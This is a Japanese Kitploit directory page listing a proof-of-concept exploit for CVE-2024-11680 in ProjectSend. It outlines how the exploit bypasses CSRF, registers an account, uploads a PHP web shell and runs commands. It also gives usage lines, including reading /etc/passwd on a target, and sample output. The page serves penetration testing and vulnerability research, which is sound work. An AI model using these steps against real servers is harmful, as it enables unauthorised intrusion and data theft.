Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-11680 — このリポジトリには、CVE-2024-11680(ProjectSend r1605 およびそれ以前のバージョンにおける深刻な脆弱性)の Proof-of-Concept (PoC) エクスプロイトが含まれています。このエクスプロイトは、不適切な権限設定とコマンドインジェクションの問題による誤った認証を対象としています。 | Kitploit
ツール/GitHubGitHub/qucklecrabik/cve-2024-11680
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubqucklecrabik/cve-2024-11680

CVE-2024-11680

このリポジトリには、CVE-2024-11680(ProjectSend r1605 およびそれ以前のバージョンにおける深刻な脆弱性)の Proof-of-Concept (PoC) エクスプロイトが含まれています。このエクスプロイトは、不適切な権限設定とコマンドインジェクションの問題による誤った認証を対象としています。

リポジトリを見る
5ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

ProjectSend CVE-2024-11680 エクスプロイト

これは、ProjectSend における CVE-2024-11680 の概念実証エクスプロイトです。この脆弱性は認証不要の設定変更とウェブシェルのアップロードを可能にします。

説明

このエクスプロイトは ProjectSend の複数の脆弱性を利用します:

  • CSRFトークンのバイパスによる設定変更
  • 安全でないクライアント登録設定
  • 無制限のファイルアップロードによるリモートコード実行

必要条件

  • Python 3.x
  • 必要な Python パッケージ:
    root@kitploit:~
    pip install requests colorama
    

使用方法

root@kitploit:~
python3 exploit.py -u <TARGET_URL> -c <COMMAND>

引数

  • -u, --url: ターゲットURL (例: http://target.com/projectsend)
  • -c, --command: ターゲット上で実行するコマンド (デフォルト: id)

使用例

root@kitploit:~
# Python バージョンを取得
python3 exploit.py -u http://target.com/projectsend -c "python3 -V"

# ディレクトリ内容を一覧表示
python3 exploit.py -u http://target.com/projectsend -c "ls -la"

# システム情報を取得
python3 exploit.py -u http://target.com/projectsend -c "uname -a"

# passwd ファイルを読み取り
python3 exploit.py -u http://target.com/projectsend -c "cat /etc/passwd"

仕組み

  1. 偵察: CSRFトークンを取得し、ターゲットの脆弱性を確認
  2. 設定操作: 安全でないクライアント登録オプションを有効化
  3. ユーザ登録: 自動承認で新しいクライアントアカウントを作成
  4. ファイルアップロード: .phtml 拡張子の PHP ウェブシェルをアップロード
  5. コマンド実行: アップロードしたシェルを介して指定コマンドを実行

特徴

  • 自動CSRFトークン抽出
  • ランダムユーザ認証情報生成
  • スマートファイル命名とタイムスタンプ検出
  • 視認性向上のためのカラー出力
  • 組み込みコマンド実行機能

法的注意事項

このツールは教育目的のみです。責任を持って、明示的なテスト許可を得たシステムでのみ使用してください。

参考文献

  • CVE-2024-11680

出力例

root@kitploit:~
[+] Target is vulnerable
[+] Insecure options enabled
[+] User registered successfully.
[+] New username: NoDLQWYF
[+] New password: X02A3g9LuN4S
[+] File uploaded: kLoISqdA.phtml
[+] File accessible at: http://target.com/projectsend/upload/files/1774958997-3b58e110c289baddfd8a6d1d5f34d96e77009fdc-kLoISqdA.phtml
[+] Command Output:
Python 3.9.2
ツールをダウンロード